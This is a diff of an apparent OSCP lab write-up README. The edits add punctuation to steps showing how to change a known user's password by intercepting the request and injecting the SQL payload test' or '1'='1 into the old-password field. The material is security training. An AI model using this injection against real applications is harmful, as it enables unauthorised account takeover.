shashihacks/OSCP-PWK/Security Insider Lab-2/README.md

 __4. Change the password of a known user (you know the login name of the user)!__
 __Solution:__
-- Navigate to `Change password`
+- Navigate to `Change password`.
-- Enter `Old password` and `New password` fields
+- Enter `Old password` and `New password` fields.
-- Capture the request
+- Capture the request.
 - Change the form data to

 ```php
     oldpwd=test'%20or%20'1'='1&newpwd1=test1234&newpwd2=test1234&submit=Submit
  ```
- - Forward the request  .
+ - Forward the request.

  ![password_change_success](assets/password_change_success.PNG)

- - Password has been successfully changed
+ - Password has been successfully changed.

 <br>